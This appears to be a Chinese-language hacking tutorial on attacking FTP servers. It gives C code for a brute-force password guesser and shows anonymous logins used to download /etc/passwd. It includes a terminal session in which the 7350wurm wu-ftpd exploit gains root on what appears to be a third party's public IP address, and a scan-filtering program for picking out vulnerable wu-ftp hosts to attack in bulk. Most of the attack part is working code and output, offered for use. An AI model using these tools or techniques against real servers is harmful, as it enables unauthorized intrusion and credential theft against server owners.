其实也没有什么的, 就是把旧的东西都拿出来再写一次啦, ftp的攻击无非就是对用户的猜解和对的ftp服务器的溢出!那我们来熟悉一下你几乎很熟悉的知识!对用户密码的猜解, 我看几乎每个扫描器都有这个功能。一直用别人的工具真的有点不好意思, 有点寄人篱下的感觉, 不知道大家有没有呢!还有的就是, 你对如何扫到密码和用户的过程了解吗?其实不难的!当你在命令行中用ftp命令连接某个ftp服务器的时候,其实也可以用那个来猜密码的就是, 手动的,那样的作法太慢了, 所以就要自己写点东西来加快进程!
D:>ftp
ftp>open 192.168.25.1
Connected to 192.168.25.1.
220 chi-1 Microsoft FTP Service (Version 5.0)
User (192.168.25.1:(none)):anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
password: (看不到的)
530 User 111@ connot log in.
Login failed
上面的是一个ftp的登陆过程,其实真正的登陆过程是ftp发给ftp服务器USER anonymous, 然后就会返回个辨认值,比如说上面的331, 只后就会等待你输入PASS xxxxx,如何成功就会登陆, 不然就要重试。
/**************************************************************/
......................
int ftp_crack(char *username,char *password,int sock) /* sock 是用socket建立的ftp连接*/
{
char *buffer = malloc(1024);
recv(sock,buffer,1024,0);
bzero(buffer,1024);
sprintf(buffer,"USER %s\n",username); /* 把USER 写入buffer */
send(sock, buffer,strlen(buffer),0); /* 用send来发送 */
printf("Try username %s \n",username);
recv(sock, buffer, 1024, 0);
sprintf(buffer,"PASS %s\n",password);
send(sock,buffer,strlen(buffer),0); /* 发送PASS */
recv(sock, buffer,1024, 0);
printf("Reply : %s \n",buffer);
if((strstr(buffer,"incorrect")) == NULL) { /* 判断是否正确 "incorrect"可改成别的,比如windows ftp server的failt" */
printf("\nFound the password %s for user %s\n",password,username);
}
..................
/***************************************************************/
上面的是代码中的一段,[全的代码] 对密码的判断就可以自动了!
现在网上还很流行的就是很多ftp都可以用anonymous或guest来登陆的,本来没有什么的,不过还是可以利用的啦, 比如你可以用cwd命来判断用户, 还有的ftp服务器,由于没有了字节的处理, 比如..../.../等, 就可以下载passwd.
ftp> open 192.168.25.3
Connect to 192.168.25.3
220 chi FTP server (version wu-2.6.2.5) ready.
User (192.168.25.3:(none)): anonymous
3331 Guest loin ok, send you complete e-mail address as password.
Password: (我写了anonymous,就上了)
230-The response ''anonymous'' is not valid
230-Next time please use your e-mail address as your password
230- for example: [email protected]
230 Guest login ok, access restriction apply.
ftp>cd /etc
250 CWD command successful.
ftp>ls
200 PORT command successful.
550 Bad directory components
ftp>get passwd
150 Opening ASCII mode data connection for passwd (79 bytes).
226 Transfer complete.
ftp: 84 bytes received in 0.00Second 84000.00Kbytes/sec.
ftp>
在的自己的电脑上的目录下就会找到passwd文件用文本打开就可以了, 大多数的是如下的
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/nonexistent
operator:*:2:20:System &:/usr/guest/operator:/bin/csh
bin:*:3:7:Binaries Commands and Source,,,:/:/nonexistent
games:*:7:13:Games pseudo-user:/usr/games:/nonexistent
news:*:8:8:News Subsystem:/:/nonexistent
man:*:9:9:Mister Man Pages:/usr/share/man:/nonexistent
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
xten:*:67:67:X-10 daemon:/usr/local/xten:/nonexistent
pop:*:68:6:Post Office Owner:/nonexistent:/nonexistent
ftp:*:999:999:anonymous ftp account:/home/ftp:/bin/csh
nobody:*:65534:65534:Unprivileged user:/nonexistent:/nonexistent
joe:*:1001:1001:User &:/home/joe:/bin/csh
norm:*:1000:1000:Norman Rossman:/home/norm:/bin/csh
khan:*:1008:1008:RobRose Net, khans.com, Robert Jenkins:/home/khan:/bin/csh
robrose:*:1056:1056:Robert Jenkins, robrose.com:/home/robrose:/bin/csh
secret:*:1002:1002:secretoflife.com:/home/secret:/bin/csh
是shadow过的, 不过不重要的, 毕竟这种的机子不多了,最少我们也知道对方的用户名了!还有种得到用户名的方法就是用cwd命令, 不过这个方法没有多大的可行性!
接下来的就是对ftp server的溢出, 网上最常见的就是wu-ftp server的溢出攻击了!
Red Hat Linux release 7.3 (Valhalla)
Kernel 2.4.18-3 on an i686
login: chi
Password:
Last login: Mon Feb 24 13:25:17 from 192.168.25.1
[chi@chi chi]$ ls
7350wurm guest.c openssl-too-open.tar.gz
dsniff-2.3-2.i386.rpm ncurses4-5.0-5.i386.rpm sniffit-0.3.7beta-1.i386.rpm
guest openssl-too-open
[chi@chi chi]$ ./7350wurm
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
Compiled for MnM 01/12/2001..pr0t!
usage: ./7350wurm [-h] [-v] [-a] [-D] [-m]
[-t <num>] [-u <user>] [-p <pass>] [-d host]
[-L <retloc>] [-A <retaddr>]
-h this help
-v be verbose (default: off, twice for greater effect)
-a AUTO mode (target from banner)
-D DEBUG mode (waits for keypresses)
-m enable mass mode (use with care)
-t num choose target (0 for list, try -v or -v -v)
-u user username to login to FTP (default: "ftp")
-p pass password to use (default: "mozilla@")
-d dest IP address or fqhn to connect to (default: 127.0.0.1)
-L loc override target-supplied retloc (format: 0xdeadbeef)
-A addr override target-supplied retaddr (format: 0xcafebabe)
[chi@chi chi]$ ./7350wurm -t 0
num . description
----+-------------------------------------------------------
1 | Caldera eDesktop|eServer|OpenLinux 2.3 update [wu-ftpd-2.6.1-13OL.i386.rpm]
2 | Debian potato [wu-ftpd_2.6.0-3.deb]
3 | Debian potato [wu-ftpd_2.6.0-5.1.deb]
4 | Debian potato [wu-ftpd_2.6.0-5.3.deb]
5 | Debian sid [wu-ftpd_2.6.1-5_i386.deb]
6 | Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]
7 | Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]
8 | Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm]
9 | Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm]
10 | Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm]
11 | RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm]
12 | RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm]
13 | RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm]
14 | RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm]
15 | RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm]
16 | RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]
17 | RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm]
18 | RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm]
19 | RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
20 | RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]
21 | SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm]
22 | SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm]
23 | SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm]
24 | SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm]
25 | SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm]
26 | SuSE 7.0 [wuftpd.rpm]
27 | SuSE 7.0 wu-2.4.2 [wuftpd.rpm]
28 | SuSE 7.1 [wuftpd.rpm]
29 | SuSE 7.1 wu-2.4.2 [wuftpd.rpm]
30 | SuSE 7.2 [wuftpd.rpm]
31 | SuSE 7.2 wu-2.4.2 [wuftpd.rpm]
32 | SuSE 7.3 [wuftpd.rpm]
33 | SuSE 7.3 wu-2.4.2 [wuftpd.rpm]
34 | Slackware 7.1
[chi@chi chi]$ ./7350wurm -a -d 62.163.38.207
# trying to log into 62.163.38.207 with (ftp/mozilla@) ...
failed to connect (user/pass correct?)
[chi@chi chi]$ ./7350wurm -a -d 62.163.35.119
# trying to log into 62.163.35.119 with (ftp/mozilla@) ... connected.
# banner: 220 odin.bilskirner.net FTP server (Version wu-2.6.1-16.7x.1) ready.
# successfully selected target from banner
### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
# 1. filling memory gaps
# 2. sending bigbuf + fakechunk
building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes
# 3. triggering free(globlist[1])
##################################################
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
Linux 2.2.16-3 #1 Mon Jun 19 18:10:14 EDT 2000 i686 unknown
ls -al
total 24
drwxr-xr-x 6 root root 4096 Apr 13 16:14 .
drwxr-xr-x 37 root root 4096 Feb 8 18:23 ..
d--x--x--x 2 root root 4096 Jul 12 2000 bin
d--x--x--x 2 root root 4096 Jul 12 2000 etc
drwxr-xr-x 2 root root 4096 Jul 12 2000 lib
drwxr-sr-x 2 root ftp 4096 Feb 5 2000 pub
.......
至于如何得到对方主机的banner呢,就可以用superscan来扫描, 扫个大点的区, 还有就是只对21对行扫描并显示主机回应,扫完后你可以一个一个的看, 看到是wu-ftp的就可以拿上去试一下, 不过个人觉得很累, 就写了个把superscan扫描结果简单化的小东东啦!自己用tc编下就可了![现成的下载]
/***********************************************************************************/
#include <stdio.h>
main(int argc,char *argv[])
FILE *in;
FILE *out;
char buf[1024];
int i,j;
if(argc<3)
printf("usage : %s <inputfile> <outputfile>",argv[0]);
exit();
in = fopen(argv[1],"r");
if(in == NULL)
puts("File open error");
out = fopen(argv[2],"w");
if(out == NULL)
puts("File write error");
while(fgets(buf,65,in) != NULL)
for(i=0;i<=50;i++)
if(buf[i] == ''w'')
if(buf[i+1] == ''u'')
fputs(buf,out);
/*****************************************************************************************/
![程序员简历上写这种项目,难怪面试当炮灰。。。二、如何让你的项目经验更有技术含量[图]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)